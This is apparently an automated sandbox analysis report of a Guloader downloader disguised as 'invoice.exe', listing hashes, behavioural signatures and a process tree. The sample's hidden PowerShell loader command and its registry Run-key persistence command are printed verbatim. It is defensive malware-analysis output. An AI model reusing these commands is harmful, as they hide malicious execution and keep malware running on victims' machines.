Analysis
- max time kernel: 361s
- max time network: 362s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 09-07-2024 12:36
Static task: static1
Behavioral task: behavioral1
Sample: invoice.exe
Resource: win7-20240705-en
General
- Target: invoice.exe
- Size: 463KB
- MD5: 5cb973edda7244515c1ddf1f532b67bc
- SHA1: e03200f1949f4c85379cb31d2d61165794efb481
- SHA256: 2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c
- SHA512: 220f5d5b8677de13495525bc825e048f25dbd9fe829f37e31a64f5ee72cf62945a1d71456a4438f96cd58496289f3cbccb2d7a3ee7fbe1c75e0ee15c93bad9ed
- SSDEEP: 12288:uKYi/LALj3EpUkdwsVZKRukGeYO+NRPNTvJiYn:bFD6rXsgPQhNRPNTxiYn
Malware Config
Signatures
- Guloader,Cloudeye
  A shellcode based downloader first seen in 2020.
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Loads dropped DLL (5 IoCs)
  Processes: invoice.exe, powershell.exe, Observerbare86.exe
  pid   process
  3020  invoice.exe (3 events)
  1816  powershell.exe
  2980  Observerbare86.exe
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes: reg.exe
  description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\Udmund = "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\\Backlash\\').Preseparated;%Internality% ($Skibsfart)"
  process: reg.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes: Observerbare86.exe
  pid   process
  2980  Observerbare86.exe (2 events)
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes: powershell.exe, Observerbare86.exe
  pid   process
  1816  powershell.exe
  2980  Observerbare86.exe
- Suspicious use of SetThreadContext (1 IoCs)
  Processes: powershell.exe
  description: PID 1816 set thread context of 2980
  pid: 1816 (powershell.exe), target process: Observerbare86.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- NSIS installer (2 IoCs)
  resource                                             yara_rule
  \Users\Admin\AppData\Local\Temp\Observerbare86.exe   nsis_installer_1
  \Users\Admin\AppData\Local\Temp\Observerbare86.exe   nsis_installer_2
- Modifies registry key (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: powershell.exe
  pid   process
  1816  powershell.exe (8 events)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes: powershell.exe
  pid   process
  1816  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe
  description: Token: SeDebugPrivilege
  pid: 1816 (powershell.exe)
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes: invoice.exe, powershell.exe, Observerbare86.exe, cmd.exe
  pid   process             target pid  target process      events
  3020  invoice.exe         1816        powershell.exe      4
  1816  powershell.exe      2980        Observerbare86.exe  6
  2980  Observerbare86.exe  1536        cmd.exe             4
  1536  cmd.exe             1144        reg.exe             4
Processes
- [depth 1] C:\Users\Admin\AppData\Local\Temp\invoice.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\invoice.exe"
  PID: 3020
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Udlbstidspunkter=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi';$Subdelegate=$Udlbstidspunkter.SubString(69683,3);.$Subdelegate($Udlbstidspunkter)"
    PID: 1816
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe"
      PID: 2980
      - Loads dropped DLL
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
        PID: 1536
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
          PID: 1144
          - Adds Run key to start application
          - Modifies registry key
Network
MITRE ATT&CK Enterprise v15
Downloads